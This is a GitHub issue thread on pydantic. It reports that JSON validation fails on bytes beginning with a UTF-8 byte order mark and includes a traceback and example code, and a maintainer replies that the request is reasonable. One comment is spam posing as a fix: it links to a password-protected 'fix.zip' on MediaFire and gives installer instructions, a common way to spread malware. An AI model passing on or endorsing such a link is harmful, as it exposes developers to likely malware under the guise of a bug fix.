### ISSUE TITLE
Handle BOM during JSON validation

### ISSUE THREAD

**Issue by Rogdham** [pydantic/pydantic#10233]
### Initial Checks

- [X] I confirm that I'm using Pydantic V2

### Description

I am parsing some JSON encoded as bytes into a Pydantic model. Before the JSON dump, there us an [UTF-8 BOM](https://en.wikipedia.org/wiki/Byte_order_mark#UTF-8) that makes Pydantic model fail.

Stacktrace:
```
Traceback (most recent call last):
  File "/tmp/p/p.py", line 10, in <module>
    foo = Foo.model_validate_json(data)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/tmp/p/env/lib/python3.12/site-packages/pydantic/main.py", line 597, in model_validate_json
    return cls.__pydantic_validator__.validate_json(json_data, strict=strict, context=context)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
pydantic_core._pydantic_core.ValidationError: 1 validation error for Foo
  Invalid JSON: expected value at line 1 column 1 [type=json_invalid, input_value=b'\xef\xbb\xbf{"bar":"\xf0\x9f\x98\x85"}', input_type=bytes]
    For further information visit https://errors.pydantic.dev/2.8/v/json_invalid
```

Note that detecting the BOM to know which encoding to choose when decoding may be a good thing to do. But for the UTF-8 BOM maybe it can be dropped altogether.

### Example Code

```Python
from pydantic import BaseModel


class Foo(BaseModel):
    bar: str


data = b'\xef\xbb\xbf{"bar":"\xf0\x9f\x98\x85"}'

foo = Foo.model_validate_json(data)

print(foo)
```

### Python, Pydantic & OS Version

```Text
pydantic version: 2.8.2
        pydantic-core version: 2.20.1
          pydantic-core build: profile=release pgo=true
                 install path: /tmp/p/env/lib/python3.12/site-packages/pydantic
               python version: 3.12.5 (main, Aug 10 2024, 12:23:28) [GCC 11.4.0]
                     platform: Linux-5.15.0-119-generic-x86_64-with-glibc2.35
             related packages: typing_extensions-4.12.2
                       commit: unknown
```

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sydney-runkle** [comment]
Ah interesting - I think this is a reasonable feature request, could use this to dynamically set the `val_bytes_mode` config setting. Marking as a feature request, help wanted!

**Comment by sydney-runkle** [comment]
I'll note, this could reside in user code in the meantime :), though it'd be more helpful if we standardized the `pydantic_core` `from_json` function to support many of the settings that `SchemaValidators` support in their json loading...
